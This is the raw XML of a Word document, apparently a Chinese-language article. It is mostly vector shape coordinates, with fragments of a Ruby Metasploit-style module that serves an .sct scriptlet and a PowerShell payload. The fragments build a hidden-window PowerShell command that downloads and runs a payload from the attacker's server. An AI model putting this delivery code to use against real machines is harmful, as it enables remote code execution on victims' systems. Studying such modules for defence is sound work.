,6794,13141,6796,13141,6798,13141,6799,13141,6801,13141,6803,13141,6805,13141,6807,13141,6808,13141,6810,13141,6812,13141,6814,13141,6817,13141,6819,13141,6821,13141,6823,13141,6825,13141,6828,13141,6830,13141,6832,13141,6835,13141,6837,13141,6840,13141,6842,13141,6845,13141,6847,13141,6850,13141,6853,13141,6856,13141,6859,13141,6862,13141,6864,13141,6867,13141,6867,13141,6867,13141,6867,13141,6867,13141,6867,13141,6867,13141,6867,13141,6867,13141,6867,13141,6867,13141,6867,13141,6867,13141,6867,13141,6867,13141,6867,13141,6867,13141,6867,13141,6867,13141,6867,13142,6867,13142,6867,13142,6867,13142,6867,13142,6867,13142,6867,13143,6867,13143,6867,13143,6867,13144,6867,13144,6867,13144,6867,13145,6867,13145,6867,13146,6867,13146,6867,13147,6867,13147,6867,13148,6867,13148,6867,13149,6867,13150,6867,13150,6867,13151,6867,13152,6867,13153,6867,13154,6867,13154,6867,13155,6867,13156,6867,13157,6867,13158,6867,13160,6867,13161,6867,13162,6867,13163,6867,13164,6867,13166,6867,13167,6867,13169,6867,13170,6867,13172,6867,13173,6867,13175,6867,13177,6867,13178,6867,13180,6867,13182,6867,13184,6867,13186,6867,13188,6867,13190,6867,13193,6867,13195,6867,13197,6867,13200,6867,13202,6867,13204,6867,13207,6867,13210,6867,13212,6867,13215,6867,13218,6867,13221,6867,13224,6867,13227,6867,13230,6867,13234,6867,13237,6867,13240,6867,13244,6867,13247,6867,13251,6867,13255,6867,13259,6867,13262,6867,13266,6867,13270,6867,13275,6867,13279,6867,13283,6867,13288,6867,13292,6867,13297,6867,13301,6867,13306,6867,13311,6867,13316,6867,13321,6867,13326,6867,13331,6867,13337,6867,13342,6867,13348,6867,13353,6867,13359,6867,13365,6867,13371,6867,13377,6867,13383,6867,13389,6867,13396,6867,13396,6867,13396,6867,13396,6867,13396,6867,13396,6867,13396,6867,13396,6867,13396,6867,13396,6867,13396,6867,13396,6867,13396,6867,13396,6867,13396,6867,13396,6867,13396,6867,13396,6867,13396,6867,13396,6867,13396,6867,13396,6867,13396,6867,13396,6867,13396,6866,13396,6866,13396,6866,13396,6866,13396,6866,13396,6866,13396,6866,13396,6865,13396,6865,13396,6865,13396,6865,13396,6864,13396,6864,13396,6864,13396,6864,13396,6863,13396,6863,13396,6863,13396,6862,13396,6862,13396,6861,13396,6861,13396,6861,13396,6860,13396,6860,13396,6859,13396,6859,13396,6858,13396,6857,13396,6857,13396,6856,13396,6856,13396,6855,13396,6854,13396,6854,13396,6853,13396,6852,13396,6851,13396,6850,13396,6850,13396,6849,13396,6848,13396,6847,13396,6846,13396,6845,13396,6844,13396,6843,13396,6842,13396,6841,13396,6840,13396,6839,13396,6837,13396,6836,13396,6835,13396,6834,13396,6832,13396,6831,13396,6830,13396,6828,13396,6827,13396,6825,13396,6824,13396,6822,13396,6821,13396,6819,13396,6817,13396,6816,13396,6814,13396,6812,13396,6810,13396,6808,13396,6806,13396,6804,13396,6802,13396,6800,13396,6798,13396,6796,13396,6794,13396,6792,13396,6790,13396,6787,13396,6785,13396,6783,13396,6780,13396,6778,13396,6775,13396,6773,13396,6770,13396,6767,13396,6765,13396,6762,13396,6759,13396,6756,13396,6753,13396,6750,13396,6747,13396,6747,13396,6747,13396,6747,13396,6747,13396,6747,13396,6747,13396,6747,13396,6747,13396,6747,13396,6747,13396,6747,13396,6747,13396,6747,13395,6747,13395,6747,13395,6747,13395,6747,13395,6747,13395,6747,13395,6747,13395,6747,13395,6747,13394,6747,13394,6747,13394,6747,13394,6747,13393,6747,13393,6747,13393,6747,13392,6747,13392,6747,13392,6747,13391,6747,13391,6747,13390,6747,13390,6747,13389,6747,13389,6747,13388,6747,13387,6747,13387,6747,13386,6747,13385,6747,13385,6747,13384,6747,13383,6747,13382,6747,13381,6747,13380,6747,13379,6747,13378,6747,13377,6747,13376,6747,13374,6747,13373,6747,13372,6747,13371,6747,13369,6747,13368,6747,13366,6747,13365,6747,13363,6747,13361,6747,13360,6747,13358,6747,13356,6747,13354,6747,13352,6747,13350,6747,13348,6747,13346,6747,13344,6747,13342,6747,13339,6747,13337,6747,13334,6747,13332,6747,13329,6747,13327,6747,13324,6747,13321,6747,13318,6747,13315,6747,13312,6747,13309,6747,13306,6747,13303,6747,13299,6747,13296,6747,13293,6747,13289,6747,13285,6747,13282,6747,13278,6747,13274,6747,13270,6747,13266,6747,13262,6747,13258,6747,13253,6747,13249,6747,13244,6747,13240,6747,13235,6747,13230,6747,13225,6747,13220,6747,13215,6747,13210,6747,13205,6747,13200,6747,13194,6747,13189,6747,13183,6747,13177,6747,13171,6747,13165,6747,13159,6747,13153,6747,13147,6747,13141e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:342.500pt;margin-top:656.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6850,13130" coordsize="130,250">
        <v:shape style="position:absolute;left:6850;top:13130;width:130;height:250" coordorigin="6850,13130" coordsize="130,250" path="m6867,13141l6867,13141,6867,13141,6867,13141,6867,13141,6867,13141,6867,13141,6867,13141,6867,13141,6867,13141,6868,13141,6868,13141,6868,13141,6868,13141,6868,13141,6868,13141,6868,13141,6868,13141,6868,13141,6868,13141,6868,13141,6868,13141,6868,13141,6868,13141,6868,13141,6868,13141,6869,13141,6869,13141,6869,13141,6869,13141,6869,13141,6869,13141,6870,13141,6870,13141,6870,13141,6870,13141,6871,13141,6871,13141,6871,13141,6871,13141,6872,13141,6872,13141,6872,13141,6873,13141,6873,13141,6874,13141,6874,13141,6874,13141,6875,13141,6875,13141,6876,13141,6876,13141,6877,13141,6877,13141,6878,13141,6879,13141,6879,13141,6880,13141,6881,13141,6881,13141,6882,13141,6883,13141,6884,13141,6884,13141,6885,13141,6886,13141,6887,13141,6888,13141,6889,13141,6890,13141,6891,13141,6892,13141,6893,13141,6894,13141,6895,13141,6896,13141,6898,13141,6899,13141,6900,13141,6901,13141,6903,13141,6904,13141,6905,13141,6907,13141,6908,13141,6910,13141,6911,13141,6913,13141,6914,13141,6916,13141,6918,13141,6919,13141,6921,13141,6923,13141,6925,13141,6927,13141,6929,13141,6930,13141,6932,13141,6935,13141,6937,13141,6939,13141,6941,13141,6943,13141,6945,13141,6948,13141,6950,13141,6952,13141,6955,13141,6957,13141,6960,13141,6962,13141,6965,13141,6968,13141,6970,13141,6973,13141,6976,13141,6979,13141,6982,13141,6985,13141,6988,13141,6988,13141,6988,13141,6988,13141,6988,13141,6988,13141,6988,13141,6988,13141,6988,13141,6988,13141,6988,13141,6988,13141,6988,13141,6988,13141,6988,13141,6988,13141,6988,13141,6988,13141,6988,13141,6988,13142,6988,13142,6988,13142,6988,13142,6988,13142,6988,13142,6988,13143,6988,13143,6988,13143,6988,13144,6988,13144,6988,13144,6988,13145,6988,13145,6988,13146,6988,13146,6988,13147,6988,13147,6988,13148,6988,13148,6988,13149,6988,13150,6988,13150,6988,13151,6988,13152,6988,13153,6988,13154,6988,13154,6988,13155,6988,13156,6988,13157,6988,13158,6988,13160,6988,13161,6988,13162,6988,13163,6988,13164,6988,13166,6988,13167,6988,13169,6988,13170,6988,13172,6988,13173,6988,13175,6988,13177,6988,13178,6988,13180,6988,13182,6988,13184,6988,13186,6988,13188,6988,13190,6988,13193,6988,13195,6988,13197,6988,13200,6988,13202,6988,13204,6988,13207,6988,13210,6988,13212,6988,13215,6988,13218,6988,13221,6988,13224,6988,13227,6988,13230,6988,13234,6988,13237,6988,13240,6988,13244,6988,13247,6988,13251,6988,13255,6988,13259,6988,13262,6988,13266,6988,13270,6988,13275,6988,13279,6988,13283,6988,13288,6988,13292,6988,13297,6988,13301,6988,13306,6988,13311,6988,13316,6988,13321,6988,13326,6988,13331,6988,13337,6988,13342,6988,13348,6988,13353,6988,13359,6988,13365,6988,13371,6988,13377,6988,13383,6988,13389,6988,13396,6988,13396,6988,13396,6988,13396,6988,13396,6988,13396,6988,13396,6988,13396,6987,13396,6987,13396,6987,13396,6987,13396,6987,13396,6987,13396,6987,13396,6987,13396,6987,13396,6987,13396,6987,13396,6987,13396,6987,13396,6987,13396,6987,13396,6987,13396,6987,13396,6987,13396,6986,13396,6986,13396,6986,13396,6986,13396,6986,13396,6986,13396,6985,13396,6985,13396,6985,13396,6985,13396,6984,13396,6984,13396,6984,13396,6984,13396,6983,13396,6983,13396,6983,13396,6982,13396,6982,13396,6981,13396,6981,13396,6981,13396,6980,13396,6980,13396,6979,13396,6979,13396,6978,13396,6978,13396,6977,13396,6976,13396,6976,13396,6975,13396,6974,13396,6974,13396,6973,13396,6972,13396,6971,13396,6971,13396,6970,13396,6969,13396,6968,13396,6967,13396,6966,13396,6965,13396,6964,13396,6963,13396,6962,13396,6961,13396,6960,13396,6959,13396,6957,13396,6956,13396,6955,13396,6954,13396,6952,13396,6951,13396,6950,13396,6948,13396,6947,13396,6945,13396,6944,13396,6942,13396,6941,13396,6939,13396,6937,13396,6936,13396,6934,13396,6932,13396,6930,13396,6928,13396,6926,13396,6924,13396,6922,13396,6920,13396,6918,13396,6916,13396,6914,13396,6912,13396,6910,13396,6907,13396,6905,13396,6903,13396,6900,13396,6898,13396,6895,13396,6893,13396,6890,13396,6887,13396,6885,13396,6882,13396,6879,13396,6876,13396,6873,13396,6870,13396,6867,13396,6867,13396,6867,13396,6867,13396,6867,13396,6867,13396,6867,13396,6867,13396,6867,13396,6867,13396,6867,13396,6867,13396,6867,13396,6867,13395,6867,13395,6867,13395,6867,13395,6867,13395,6867,13395,6867,13395,6867,13395,6867,13395,6867,13394,6867,13394,6867,13394,6867,13394,6867,13393,6867,13393,6867,13393,6867,13392,6867,13392,6867,13392,6867,13391,6867,13391,6867,13390,6867,13390,6867,13389,6867,13389,6867,13388,6867,13387,6867,13387,6867,13386,6867,13385,6867,13385,6867,13384,6867,13383,6867,13382,6867,13381,6867,13380,6867,13379,6867,13378,6867,13377,6867,13376,6867,13374,6867,13373,6867,13372,6867,13371,6867,13369,6867,13368,6867,13366,6867,13365,6867,13363,6867,13361,6867,13360,6867,13358,6867,13356,6867,13354,6867,13352,6867,13350,6867,13348,6867,13346,6867,13344,6867,13342,6867,13339,6867,13337,6867,13334,6867,13332,6867,13329,6867,13327,6867,13324,6867,13321,6867,13318,6867,13315,6867,13312,6867,13309,6867,13306,6867,13303,6867,13299,6867,13296,6867,13293,6867,13289,6867,13285,6867,13282,6867,13278,6867,13274,6867,13270,6867,13266,6867,13262,6867,13258,6867,13253,6867,13249,6867,13244,6867,13240,6867,13235,6867,13230,6867,13225,6867,13220,6867,13215,6867,13210,6867,13205,6867,13200,6867,13194,6867,13189,6867,13183,6867,13177,6867,13171,6867,13165,6867,13159,6867,13153,6867,13147,6867,1314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Otherwise,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serve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PowerShell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payload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54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_request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raw_uri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z w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>~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sct$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55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serve_sct_file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56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else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57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serve_psh_payload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58</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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end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26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59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60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61</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="12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62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def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serve_sct_file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57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63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print_status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"Handling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request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.sct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#{cli.peerhos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2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>t}"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ignore_cert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Rex::Powershell::PshMethods</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="2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ignore_ssl_certificate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11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sl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65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download_string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Rex::Powershell::PshMethods</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="2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proxy_aware_download_an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d_exec_string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get_uri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66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download_and_run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"#{ignore_cert}#{download_string}"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psh_command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generate_psh_command_line</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="23"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(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68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noprofile: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windowstyle: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'hidden'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70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command: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download_and_run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71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data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gen_sct_file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psh_command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send_response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cli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data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'Content‐Type'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'text/plain'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26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74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75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76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77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def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serve_psh_payload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print_status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"Delivering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#{cli.peerhost}"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data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cmd_psh_payload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payload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encoded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payload_instance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="1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arch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first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remove_comspec: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82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use_single_quotes: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true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83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send_response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cli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data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'Content‐Type'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'application/octet‐stream'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="23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26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85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86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87</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="12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88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def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rand_class_id</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="114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89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"#{Rex::Text.rand_text_hex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8}‐#{Rex::Text.rand_text_hex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4}‐#{Rex::Tex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t.rand_text_hex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4}‐#{Rex::Text.rand_text_hex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4}‐#{Rex::Text.rand_text_hex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12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>}"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409.200pt;width:7.200pt;height:7.200pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId16" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:520.111pt;margin-top:0.0pt;width:0.0pt;height:217.334pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,4346">
        <v:shape style="position:absolute;left:10402;top:0;width:0;height:4346" coordorigin="10402,0" coordsize="0,4346" path="m10402,0l10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,1,10402,1,10402,2,10402,3,10402,4,10402,5,10402,7,10402,8,10402,10,10402,12,10402,15,10402,17,10402,20,10402,23,10402,27,10402,31,10402,35,10402,40,10402,45,10402,50,10402,56,10402,62,10402,69,10402,76,10402,84,10402,92,10402,101,10402,110,10402,120,10402,130,10402,141,10402,153,10402,165,10402,177,10402,191,10402,205,10402,219,10402,235,10402,251,10402,267,10402,285,10402,303,10402,322,10402,342,10402,362,10402,384,10402,406,10402,429,10402,452,10402,477,10402,503,10402,529,10402,557,10402,585,10402,614,10402,644,10402,676,10402,708,10402,741,10402,775,10402,811,10402,847,10402,884,10402,923,10402,962,10402,1003,10402,1045,10402,1088,10402,1132,10402,1177,10402,1224,10402,1271,10402,1320,10402,1370,10402,1422,10402,1474,10402,1528,10402,1584,10402,1640,10402,1698,10402,1757,10402,1818,10402,1880,10402,1943,10402,2008,10402,2074,10402,2142,10402,2211,10402,2282,10402,2354,10402,2427,10402,2502,10402,2579,10402,2657,10402,2737,10402,2818,10402,2901,10402,2985,10402,3072,10402,3159,10402,3249,10402,3340,10402,3433,10402,3527,10402,3623,10402,3721,10402,3821,10402,3922,10402,4026,10402,4131,10402,4238,10402,4346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7.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1350" coordsize="8990,350">
        <v:shape style="position:absolute;left:1490;top:1350;width:8990;height:350" coordorigin="1490,1350" coordsize="8990,35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5,10484,1376,10484,1376,10484,1376,10484,1376,10484,1377,10484,1377,10484,1377,10484,1377,10484,1378,10484,1378,10484,1379,10484,1379,10484,1379,10484,1380,10484,1381,10484,1381,10484,1382,10484,1382,10484,1383,10484,1384,10484,1385,10484,1385,10484,1386,10484,1387,10484,1388,10484,1389,10484,1390,10484,1391,10484,1393,10484,1394,10484,1395,10484,1396,10484,1398,10484,1399,10484,1401,10484,1402,10484,1404,10484,1406,10484,1407,10484,1409,10484,1411,10484,1413,10484,1415,10484,1417,10484,1419,10484,1421,10484,1424,10484,1426,10484,1428,10484,1431,10484,1434,10484,1436,10484,1439,10484,1442,10484,1445,10484,1448,10484,1451,10484,1454,10484,1457,10484,1461,10484,1464,10484,1468,10484,1471,10484,1475,10484,1479,10484,1483,10484,1487,10484,1491,10484,1495,10484,1499,10484,1504,10484,1508,10484,1513,10484,1518,10484,1522,10484,1527,10484,1532,10484,1537,10484,1543,10484,1548,10484,1554,10484,1559,10484,1565,10484,1571,10484,1577,10484,1583,10484,1589,10484,1595,10484,1601,10484,1608,10484,1615,10484,1621,10484,1628,10484,1635,10484,1643,10484,1650,10484,1657,10484,1665,10484,1673,10484,1681,10484,1688,10484,1697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5,1510,1704,1510,1704,1510,1704,1510,1704,1510,1704,1510,1704,1510,1704,1510,1703,1510,1703,1510,1703,1510,1702,1510,1702,1510,1702,1510,1701,1510,1701,1510,1701,1510,1700,1510,1700,1510,1699,1510,1698,1510,1698,1510,1697,1510,1696,1510,1696,1510,1695,1510,1694,1510,1693,1510,1692,1510,1691,1510,1690,1510,1689,1510,1688,1510,1687,1510,1686,1510,1685,1510,1683,1510,1682,1510,1680,1510,1679,1510,1677,1510,1676,1510,1674,1510,1672,1510,1670,1510,1669,1510,1667,1510,1665,1510,1663,1510,1660,1510,1658,1510,1656,1510,1653,1510,1651,1510,1649,1510,1646,1510,1643,1510,1640,1510,1638,1510,1635,1510,1632,1510,1629,1510,1625,1510,1622,1510,1619,1510,1615,1510,1612,1510,1608,1510,1605,1510,1601,1510,1597,1510,1593,1510,1589,1510,1585,1510,1580,1510,1576,1510,1571,1510,1567,1510,1562,1510,1557,1510,1552,1510,1547,1510,1542,1510,1537,1510,1532,1510,1526,1510,1520,1510,1515,1510,1509,1510,1503,1510,1497,1510,1491,1510,1484,1510,1478,1510,1472,1510,1465,1510,1458,1510,1451,1510,1444,1510,1437,1510,1430,1510,1422,1510,1415,1510,1407,1510,1399,1510,1391,1510,1383,1510,1375e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:68.500pt;width:1.500pt;height:16.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1370" coordsize="30,330">
        <v:shape style="position:absolute;left:1490;top:1370;width:30;height:330" coordorigin="1490,1370" coordsize="30,330" path="m1517,1375l1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1376,1517,1376,1517,1376,1517,1376,1517,1377,1517,1377,1517,1377,1517,1377,1517,1378,1517,1378,1517,1379,1517,1379,1517,1379,1517,1380,1517,1381,1517,1381,1517,1382,1517,1382,1517,1383,1517,1384,1517,1385,1517,1385,1517,1386,1517,1387,1517,1388,1517,1389,1517,1390,1517,1391,1517,1393,1517,1394,1517,1395,1517,1396,1517,1398,1517,1399,1517,1401,1517,1402,1517,1404,1517,1406,1517,1407,1517,1409,1517,1411,1517,1413,1517,1415,1517,1417,1517,1419,1517,1421,1517,1424,1517,1426,1517,1428,1517,1431,1517,1434,1517,1436,1517,1439,1517,1442,1517,1445,1517,1448,1517,1451,1517,1454,1517,1457,1517,1461,1517,1464,1517,1468,1517,1471,1517,1475,1517,1479,1517,1483,1517,1487,1517,1491,1517,1495,1517,1499,1517,1504,1517,1508,1517,1513,1517,1518,1517,1522,1517,1527,1517,1532,1517,1537,1517,1543,1517,1548,1517,1554,1517,1559,1517,1565,1517,1571,1517,1577,1517,1583,1517,1589,1517,1595,1517,1601,1517,1608,1517,1615,1517,1621,1517,1628,1517,1635,1517,1643,1517,1650,1517,1657,1517,1665,1517,1673,1517,1681,1517,1688,1517,1697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6,10484,1811,10484,1815,10484,1819,10484,1823,10484,1828,10484,1832,10484,1837,10484,1842,10484,1846,10484,1851,10484,1857,10484,1862,10484,1867,10484,1873,10484,1878,10484,1884,10484,1890,10484,1896,10484,1902,10484,1908,10484,1914,10484,1921,10484,1927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0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6,1517,1811,1517,1815,1517,1819,1517,1823,1517,1828,1517,1832,1517,1837,1517,1842,1517,1846,1517,1851,1517,1857,1517,1862,1517,1867,1517,1873,1517,1878,1517,1884,1517,1890,1517,1896,1517,1902,1517,1908,1517,1914,1517,1921,1517,1927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58.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2070" coordsize="8990,1170">
        <v:shape style="position:absolute;left:1490;top:2070;width:8990;height:1170" coordorigin="1490,2070" coordsize="8990,11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1,10484,2081,10484,2081,10484,2081,10484,2082,10484,2082,10484,2082,10484,2083,10484,2083,10484,2084,10484,2085,10484,2086,10484,2086,10484,2087,10484,2088,10484,2090,10484,2091,10484,2092,10484,2094,10484,2095,10484,2097,10484,2099,10484,2101,10484,2103,10484,2105,10484,2107,10484,2110,10484,2112,10484,2115,10484,2118,10484,2121,10484,2125,10484,2128,10484,2132,10484,2135,10484,2139,10484,2143,10484,2148,10484,2152,10484,2157,10484,2162,10484,2167,10484,2172,10484,2178,10484,2183,10484,2189,10484,2196,10484,2202,10484,2209,10484,2216,10484,2223,10484,2230,10484,2238,10484,2246,10484,2254,10484,2262,10484,2271,10484,2280,10484,2289,10484,2298,10484,2308,10484,2318,10484,2329,10484,2339,10484,2350,10484,2362,10484,2373,10484,2385,10484,2397,10484,2410,10484,2423,10484,2436,10484,2449,10484,2463,10484,2477,10484,2492,10484,2507,10484,2522,10484,2537,10484,2553,10484,2570,10484,2586,10484,2604,10484,2621,10484,2639,10484,2657,10484,2676,10484,2695,10484,2714,10484,2734,10484,2754,10484,2775,10484,2796,10484,2817,10484,2839,10484,2861,10484,2884,10484,2907,10484,2931,10484,2955,10484,2980,10484,3005,10484,3030,10484,3056,10484,3082,10484,3109,10484,3137,10484,3164,10484,3193,10484,3221,10484,3251,10484,3251,10484,3251,10484,3251,10484,3251,10484,3251,10484,3251,10483,3251,10482,3251,10482,3251,10480,3251,10479,3251,10477,3251,10475,3251,10473,3251,10470,3251,10466,3251,10462,3251,10458,3251,10453,3251,10448,3251,10442,3251,10435,3251,10428,3251,10419,3251,10411,3251,10401,3251,10391,3251,10379,3251,10367,3251,10354,3251,10340,3251,10326,3251,10310,3251,10293,3251,10275,3251,10256,3251,10236,3251,10215,3251,10192,3251,10168,3251,10143,3251,10117,3251,10090,3251,10061,3251,10031,3251,9999,3251,9966,3251,9931,3251,9895,3251,9858,3251,9819,3251,9778,3251,9735,3251,9691,3251,9646,3251,9598,3251,9549,3251,9498,3251,9445,3251,9391,3251,9334,3251,9275,3251,9215,3251,9153,3251,9088,3251,9022,3251,8953,3251,8883,3251,8810,3251,8735,3251,8658,3251,8578,3251,8497,3251,8413,3251,8326,3251,8238,3251,8146,3251,8053,3251,7957,3251,7859,3251,7758,3251,7654,3251,7548,3251,7439,3251,7328,3251,7214,3251,7097,3251,6977,3251,6855,3251,6730,3251,6602,3251,6471,3251,6337,3251,6201,3251,6061,3251,5918,3251,5773,3251,5624,3251,5472,3251,5317,3251,5159,3251,4997,3251,4833,3251,4665,3251,4494,3251,4319,3251,4141,3251,3960,3251,3776,3251,3587,3251,3396,3251,3201,3251,3002,3251,2800,3251,2594,3251,2385,3251,2172,3251,1955,3251,1734,3251,1510,3251,1510,3251,1510,3251,1510,3251,1510,3251,1510,3251,1510,3251,1510,3250,1510,3250,1510,3250,1510,3250,1510,3250,1510,3250,1510,3249,1510,3249,1510,3249,1510,3248,1510,3248,1510,3247,1510,3247,1510,3246,1510,3245,1510,3244,1510,3243,1510,3242,1510,3241,1510,3240,1510,3238,1510,3237,1510,3235,1510,3234,1510,3232,1510,3230,1510,3228,1510,3226,1510,3223,1510,3221,1510,3218,1510,3215,1510,3213,1510,3209,1510,3206,1510,3203,1510,3199,1510,3195,1510,3191,1510,3187,1510,3183,1510,3179,1510,3174,1510,3169,1510,3164,1510,3158,1510,3153,1510,3147,1510,3141,1510,3135,1510,3129,1510,3122,1510,3115,1510,3108,1510,3101,1510,3093,1510,3085,1510,3077,1510,3069,1510,3060,1510,3051,1510,3042,1510,3032,1510,3022,1510,3012,1510,3002,1510,2991,1510,2980,1510,2969,1510,2958,1510,2946,1510,2934,1510,2921,1510,2908,1510,2895,1510,2881,1510,2868,1510,2853,1510,2839,1510,2824,1510,2809,1510,2793,1510,2777,1510,2761,1510,2744,1510,2727,1510,2710,1510,2692,1510,2674,1510,2655,1510,2636,1510,2617,1510,2597,1510,2577,1510,2556,1510,2535,1510,2513,1510,2492,1510,2469,1510,2446,1510,2423,1510,2400,1510,2376,1510,2351,1510,2326,1510,2301,1510,2275,1510,2248,1510,2221,1510,2194,1510,2166,1510,2138,1510,2109,1510,2080e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:103.500pt;width:1.500pt;height:58.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2070" coordsize="30,1170">
        <v:shape style="position:absolute;left:1490;top:2070;width:30;height:1170" coordorigin="1490,2070" coordsize="30,1170" path="m1517,2080l1517,2080,1517,2080,1517,2080,1517,2080,1517,2080,1517,2080,1517,2080,1517,2080,1517,2080,1517,2081,1517,2081,1517,2081,1517,2081,1517,2082,1517,2082,1517,2082,1517,2083,1517,2083,1517,2084,1517,2085,1517,2086,1517,2086,1517,2087,1517,2088,1517,2090,1517,2091,1517,2092,1517,2094,1517,2095,1517,2097,1517,2099,1517,2101,1517,2103,1517,2105,1517,2107,1517,2110,1517,2112,1517,2115,1517,2118,1517,2121,1517,2125,1517,2128,1517,2132,1517,2135,1517,2139,1517,2143,1517,2148,1517,2152,1517,2157,1517,2162,1517,2167,1517,2172,1517,2178,1517,2183,1517,2189,1517,2196,1517,2202,1517,2209,1517,2216,1517,2223,1517,2230,1517,2238,1517,2246,1517,2254,1517,2262,1517,2271,1517,2280,1517,2289,1517,2298,1517,2308,1517,2318,1517,2329,1517,2339,1517,2350,1517,2362,1517,2373,1517,2385,1517,2397,1517,2410,1517,2423,1517,2436,1517,2449,1517,2463,1517,2477,1517,2492,1517,2507,1517,2522,1517,2537,1517,2553,1517,2570,1517,2586,1517,2604,1517,2621,1517,2639,1517,2657,1517,2676,1517,2695,1517,2714,1517,2734,1517,2754,1517,2775,1517,2796,1517,2817,1517,2839,1517,2861,1517,2884,1517,2907,1517,2931,1517,2955,1517,2980,1517,3005,1517,3030,1517,3056,1517,3082,1517,3109,1517,3137,1517,3164,1517,3193,1517,3221,1517,3251e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:161.500pt;width:449.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,3230" coordsize="8990,390">
        <v:shape style="position:absolute;left:1490;top:3230;width:8990;height:390" coordorigin="1490,3230" coordsize="8990,390" path="m1510,3251l1510,3251,1510,3251,1510,3251,1510,3251,1510,3251,1510,3251,1511,3251,1512,3251,1512,3251,1514,3251,1515,3251,1517,3251,1519,3251,1521,3251,1524,3251,1528,3251,1532,3251,1536,3251,1541,3251,1546,3251,1552,3251,1559,3251,1566,3251,1575,3251,1583,3251,1593,3251,1603,3251,1615,3251,1627,3251,1640,3251,1654,3251,1668,3251,1684,3251,1701,3251,1719,3251,1738,3251,1758,3251,1780,3251,1802,3251,1826,3251,1851,3251,1877,3251,1904,3251,1933,3251,1963,3251,1995,3251,2028,3251,2063,3251,2099,3251,2136,3251,2175,3251,2216,3251,2259,3251,2303,3251,2348,3251,2396,3251,2445,3251,2496,3251,2549,3251,2604,3251,2660,3251,2719,3251,2779,3251,2841,3251,2906,3251,2972,3251,3041,3251,3112,3251,3184,3251,3259,3251,3336,3251,3416,3251,3498,3251,3582,3251,3668,3251,3757,3251,3848,3251,3941,3251,4037,3251,4136,3251,4236,3251,4340,3251,4446,3251,4555,3251,4666,3251,4780,3251,4897,3251,5017,3251,5139,3251,5264,3251,5392,3251,5523,3251,5657,3251,5793,3251,5933,3251,6076,3251,6222,3251,6370,3251,6522,3251,6677,3251,6835,3251,6997,3251,7161,3251,7329,3251,7500,3251,7675,3251,7853,3251,8034,3251,8219,3251,8407,3251,8598,3251,8793,3251,8992,3251,9194,3251,9400,3251,9609,3251,9823,3251,10039,3251,10260,3251,10484,3251,10484,3251,10484,3251,10484,3251,10484,3251,10484,3251,10484,3251,10484,3251,10484,3251,10484,